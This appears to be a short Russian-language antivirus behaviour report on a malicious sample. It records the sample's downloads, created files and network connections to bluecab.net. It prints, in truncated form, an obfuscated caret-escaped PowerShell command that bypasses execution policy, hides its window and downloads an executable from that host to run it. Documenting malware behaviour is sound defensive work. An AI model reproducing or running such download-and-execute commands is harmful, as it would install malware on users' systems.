Техническая информация
Вредоносные функции
Загружает и запускает на исполнение
- http://bluecab.net/lo07.exe как %appdata%.exe
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c "P^OWER^shelL^.^exe ^-e^XE^cUT^I^onPolIC^y^ BYpaSs -^no^pR^OfI^LE -wiN^Do^w^S^t^yle^ HI^DdEn (neW^-^O^bj^Ec^T S^Y^S^tEM^.Ne^T^.we^bCl^i^ENT)^.do^WnLOAdFIl^e('http://bluecab.n...
Изменения в файловой системе
Создает следующие файлы
- %APPDATA%.exe
Сетевая активность
Подключается к
- 'bl##cab.net':80
TCP
Запросы HTTP GET
- http://bl##cab.net/lo07.exe
UDP
- DNS ASK bl##cab.net
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c "P^OWER^shelL^.^exe ^-e^XE^cUT^I^onPolIC^y^ BYpaSs -^no^pR^OfI^LE -wiN^Do^w^S^t^yle^ HI^DdEn (neW^-^O^bj^Ec^T S^Y^S^tEM^.Ne^T^.we^bCl^i^ENT)^.do^WnLOAdFIl^e('http://bluecab.n...' (со скрытым окном)
